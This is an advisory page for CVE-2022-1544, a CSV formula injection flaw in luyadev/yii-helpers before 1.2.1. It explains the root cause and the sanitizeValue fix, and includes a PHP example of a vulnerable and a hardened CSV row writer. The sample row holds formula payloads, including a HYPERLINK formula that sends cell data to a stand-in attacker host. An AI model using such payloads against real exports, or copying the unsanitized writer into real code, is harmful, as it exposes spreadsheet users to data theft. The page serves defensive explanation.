
CVE-2022-1544: Improper neutralization of formula elements in yii-helpers

CVSS Score
7.8 (CVSS v3.1)

Basic Information

EPSS Score
0.6421%
Published
5/3/2022
Updated
2/1/2023
KEV Status
No
Technology
PHP

Technical Details

CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Package Name
luyadev/yii-helpers
Ecosystem
composer
Vulnerable Versions
< 1.2.1
First Patched Version
1.2.1

Vulnerability Intelligence

Root Cause Analysis (Miggo AI)

The vulnerability stems from the pre-patch implementation of CSV generation in generateRow. The original code (before 1.2.1) only escaped quotes and did not neutralize formula elements, so a cell value such as =1+2 was written verbatim and is evaluated as a formula when the exported file is opened in a spreadsheet application. The patch introduced a sanitizeValue method that prefixes a single quote to values beginning with a formula-starting character, which the vulnerable version lacked. The updated test case in ExportHelperTest.php confirms the fix by asserting that an '=1+2' payload is sanitized. The CWE-1236 classification and the advisory details point to CSV formula injection in the CSV generation logic handled by this function. The CVSS vector (AV:L, UI:R) reflects that exploitation requires a victim to open the exported file locally in a spreadsheet application.
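As an added illustration (not code from luyadev/yii-helpers; the function names, the list of formula-starting characters and the sample row are assumptions constructed for this example), the following PHP script places a quote-escaping-only row writer, the pattern described above as vulnerable, beside a hardened one that applies the single-quote prefix before the escaping step:

```php
<?php
// Added example for this advisory page; not code from luyadev/yii-helpers.
// csv_row_vulnerable(), sanitize_cell() and csv_row_hardened() are
// hypothetical names, and the formula-starter list below is an assumption
// based on common spreadsheet behaviour, not taken from the library.

/**
 * Vulnerable pattern: doubles embedded quotes and wraps each field, but
 * writes a value such as "=1+2" verbatim, so a spreadsheet that opens the
 * file evaluates it as a formula.
 */
function csv_row_vulnerable(array $values, string $delimiter = ','): string
{
    $cells = [];
    foreach ($values as $value) {
        $cells[] = '"' . str_replace('"', '""', (string) $value) . '"';
    }
    return implode($delimiter, $cells) . "\n";
}

/**
 * Neutralize one cell. A leading '=', '+', '-' or '@' starts a formula in
 * common spreadsheet applications (assumed list; tab and CR are included
 * because some importers also treat them as formula starters). Prefixing
 * a single quote forces the cell to be read as text. Genuine numbers are
 * left alone so that "-5" is not rewritten.
 */
function sanitize_cell(string $value): string
{
    // Inspect the first non-whitespace byte so " =1+2" is not missed; the
    // leading whitespace is dropped when a prefix is applied.
    $trimmed = ltrim($value, " \t\r\n");
    if ($trimmed === '' || is_numeric($trimmed)) {
        return $value;
    }
    $formulaStarters = ['=', '+', '-', '@', "\t", "\r"];
    if (in_array($trimmed[0], $formulaStarters, true)) {
        return "'" . $trimmed;
    }
    return $value;
}

/**
 * Hardened pattern: sanitize every cell, then apply the same quote escaping.
 */
function csv_row_hardened(array $values, string $delimiter = ','): string
{
    $cells = [];
    foreach ($values as $value) {
        $cell = sanitize_cell((string) $value);
        $cells[] = '"' . str_replace('"', '""', $cell) . '"';
    }
    return implode($delimiter, $cells) . "\n";
}

// Constructed sample row: fields two, three and five stand in for
// attacker-controlled input that an export feature copies out unchanged.
$row = [
    'alice',
    '=1+2',
    '=HYPERLINK("http://attacker.example/?leak="&A1,"open")',
    '-5',
    '  @SUM(A1:A3)',
];

echo 'vulnerable: ' . csv_row_vulnerable($row);
echo 'hardened:   ' . csv_row_hardened($row);
```

Run with `php example.php`. The vulnerable line carries "=1+2" and the HYPERLINK payload unchanged, while the hardened line emits them as "'=1+2" and "'=HYPERLINK(...)", which spreadsheets display as text; "-5" survives untouched because of the is_numeric check. The prefix must be applied before quote escaping, since escaping alone, as in the pre-1.2.1 code, only keeps the CSV well-formed and says nothing about how the consuming application interprets the cell.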

WAF Protection Rules

WAF Rule

Formula Injection/CSV Injection due to Improper Neutralization of Formula Elements in CSV File in GitHub repository luyadev/yii-helpers prior to 1.2.1. Successful exploitation can lead to impacts such as client-side command injection, code execution

Reasoning

The vulnerability stems from the pre-patch implementation of CSV generation in `generateRow`. The original code (before 1.2.1) used simple quote escaping but didn't address formula injection vectors. The patch introduced a new `sanitizeValue` method.